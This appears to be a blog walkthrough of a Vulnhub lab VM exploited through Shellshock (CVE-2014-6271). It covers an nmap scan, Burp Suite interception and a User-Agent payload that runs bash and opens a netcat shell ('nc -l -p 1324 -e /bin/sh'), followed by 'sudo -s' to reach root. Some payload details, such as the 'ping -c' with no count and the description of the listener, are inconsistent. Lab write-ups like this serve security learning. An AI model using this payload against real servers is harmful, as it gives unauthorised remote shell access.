CVE 2014-6271 : Shellshock

Welcome

This VM does not contain any flags and is a boot2root challenge and the ultimate goal is to get root access. The CVE 2014-6271 : Shellshock vulnerability was a very severe vulnerability as it gave the attacker directly shell access. This VM was downloaded from VULNHUB. I am using VMWare Workstation Pro 12 and my attacker machine is Parrot OS 3.4.1. I am on bridged network so I am directly connected to the router by my VM.Hope everyone knows how to setup a lab, and if not please search on Google on How to Setup A VM on VMWare, there are many tutorials available on the internet.If you want any information or want to download the CVE 2014-6271 : Shellshock VM. So I just boot up my VMs.Here my IP address for eth0-192.168.16.105 and for eth1-192.168.192.132.

1.pngn

After knowing the IP I start NMAP scan. The same can be done by NETDISCOVER.

23

We can see the NMAP scan is more detailed as it also provides us with the port state. As we can see from 1st image that port 80 is open that means a site is hosted on it.As I open it in my browser I can see a website hosted on the IP.

4.png

There was nothing interesting on the web page so I decided to check the source and still got nothing interesting.9.png5.png

Then I got an idea and started BURPSUITE and then set the proxy to 127.0.0.1 and the set the port to 8080. To change the proxy settings in Firefox goto menu and click on Preferences and then from the side menu click on Advanced and then switch to Network and then click on Connection Settings. Another method of doing this is to download a add-on named FoxyProxy. In BURPSUITE I turned off the intercept in the proxy tab. And then reloaded the target IP in the browser. The request got captured on HTTP History tab in the Proxy tab.6

Then I right clicked on the request and selected the option to send it to repeater. You will see the Repeater tab glow up as soon as the request reaches it. In the Repeater tab double click on the user agent field and change the user agent to a malicious payload. The payload is : () { :; }; /bin/bash -c ‘ping -c 192.168.16.105 ; nc -l -p 1324 -e /bin/sh’  . Here the IP address is of my attacker VM and the port is the one which we will listen onto. Click on GO. Nothing will happen and it will return nothing , which means our payload is being processed in the background.8.png

Open  a new terminal window and start NETCAT listerner on the port number mentioned in the payload (which in my case is 1324). Nothing happens when we execute the NETCAT command , so I just type whoami command to see whether anything happens and boom! Looks like we got a shell. And then a simple sudo -s command and we are root.9.png

DONE!

If you have any queries or any suggestions please leave it in the comments section below.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s